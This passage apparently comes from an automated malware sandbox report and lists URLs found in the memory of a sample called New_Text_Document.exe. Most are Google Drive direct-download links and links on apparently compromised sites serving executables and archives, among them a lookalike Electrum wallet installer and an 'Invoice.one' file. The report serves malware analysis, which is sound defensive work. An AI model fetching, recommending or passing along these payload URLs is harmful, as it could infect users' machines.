                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&confirm=t&id=145b1FbjTYee3W1RjsAzo7hzCoiiaXZum&uuid=eb58
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&confirm=t&id=1bs6FWvGvS2ybzTttR9FF5UhzwlA25GJ6&uuid=9b7e
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12Ma_YvBmprTs6E_VkFNMWIkRNWSARQbW
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=12ZHu5cy9mnTlHoz9fQ7v9q_-XI-iOZMJ
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15CEUwtx10E5Bc6Z59t-lZkjZJzrY0_XV
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=166UMZeEOlCiRtwvqVMwcseLvEkuK4iHn
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16qWdek8OBiNCZfaUGdrXAPQ3sh0jS7xf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1C96Yr8vZUfMBD3hUUVqQN-4iPDnMn7ni
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ETPmpb2shvUny5DxJ5awfpxklxqpBzGx
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Esmx-uERj9DSXPuBwctU7fjBwSgUvRRX
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1GVnZexVVs3VPv0-ihFlWnmzMHIJ3qqlY
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JVqaQHW3wRdY09Sf69rSGgXMk_jl7lz5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1N8_s6gIjereArczwh74BlKYgOdIg64eO
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1NW1GmZG6LwTuhs0TTE969xcFpP9_dc5q
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Nx37RCYoclIfch3waaDdhUzClYJ4OUUe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1O9jG3OQYEWNcoPTigwsCdbTfMvtfQyGJ
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1PHipE_u-1WZEUOP18CqoH9TNSY4lpeY3
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Pr2l1wFpWhFzLN-sq93Bb9XWfQtRwEzU
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Tt_d2Mf24YqBtzG94dOHBZOegv4l7-3z
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1UD7JvCLuULBsJnjWL_TgWruqe62DbUcr
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1UJAo2mXezQpPwYWfF2W2-ZBr39vcapK5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1YfqTuGAHQHQrUlWUGDEkEAvfFktSL8cI
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1alQ8r5TnR6wWIfTqA3l6D9FYMv7y0G9m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1b6t1MjNJCvnDcY-MDQQ0NeqRBOcqYJu4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ctnmuSYjUQKRXgVd6uPH5tTB4-sb1zXR
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1deAE0kolgmwTOUQesgg1GAM7bDGS1pWP
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1fRSD4HzgXqWObe_X9YI6x7SLPQjK8nbi
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1gc-4CEWi-on-F6CYwm2NbpBxBtAmezRt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1l33hUq3g4tbtkztteH_SGOPL2hbQERCn
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ma38y_tMKWP6Spyu_Omub2NtYZoLB0qJ
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1sAtMEXZN3QpVqzfxNc-5Dtnnn8lIHDXH
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1t71I53b4BrXOdKGrWWZLLdEEq4Uc121T
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1uYGnPwZZyzn2rODSRImg0-SlOxy_leTG
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1v5A676454Tly-_qpuv0g08wPFH6szQOI
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1vsn9Tb_tm3YktycWG9idKBjC1j54nNSf
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1wv07Wdj_zNCPE-bn4lXwuR1QUgt3HtKL
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1z7QhwCOzJWeHKsdhw-YUiVac2JzwjQiA
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1EkCinmSkdDDuir6REyjrJYZVCyW-1IDJ&export=download
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1KAVUOwL0C1MMS_VTXOzW-cWQ7HWtO0El&export=download&authuser=0
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1Re8EwllfL3PJf1m1ywjWjWBItzqqmhJS&export=download
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1a7jWDzayVXW_d3CgV_N7TjF4STY3UFOr&export=download
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1gWsdCU5Mxxo0oq3KIaErLwqqcPXBg74p&export=download&authuser=0
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?id=1nmo38gWDllGZYd-hnHpVh9gQ81WETj3X&export=download
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?impresion=videocadenasur
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dsmedicalusa.com/ai/
                    Source: raserver.exe, 00000014.00000003.1555128437.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: raserver.exe, 00000014.00000003.1555128437.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: raserver.exe, 00000014.00000003.1555128437.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dukaaaan.com/isn/
                    Source: svchost.exe, 00000006.00000003.1373317565.0000020CEEA2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000006.00000002.1381330295.0000020CEEA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000006.00000003.1368426234.0000020CEEA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381946680.0000020CEEA62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000006.00000003.1372813979.0000020CEEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381330295.0000020CEEA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000006.00000003.1373317565.0000020CEEA2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1373533755.0000020CEEA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000006.00000003.1372907688.0000020CEEA57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1381581903.0000020CEEA58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e-commerce.saleensuporte.com.br/z4voa7.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://easycurrentaffairs.com/pe/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ebenezercartagena.org/wp-content/download/File.7z?pfile=file.zip
                    Source: svchost.exe, 00000006.00000003.1368329269.0000020CEEA67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1380944116.0000020CEEA2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1382059296.0000020CEEA68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edenstarsaigonhotel.com/sie/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://edf41f52-452f-4671-a310-1da9f1d2ecd8.usrfiles.com/ugd/edf41f_944e7bd73a6542f0987c6be1b132301
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://electnum.com/4.4.5/electrum-4.4.5.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://elliert.github.io/dznl/xdevk.png
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://elvalledetarrazu.com/cgi-bin/rpOzK/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://empresape.com/eldi/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://empresape.com/eldi/?94516141
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://encurtador.com.br/crDLT
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://entergospel.com/coa/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://enterr10tv.com/iumo/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://et3.ektpnc.com/downloads/GG_AI_Setup.zip
                    Source: explorer.exe, 0000000C.00000000.1312346993.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://exploraretail.com/.ACTIVATED.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://expressionsofwood.ca/Invoice.one
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extantlaws.com/netTime.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extintoresflash.cl/eat/
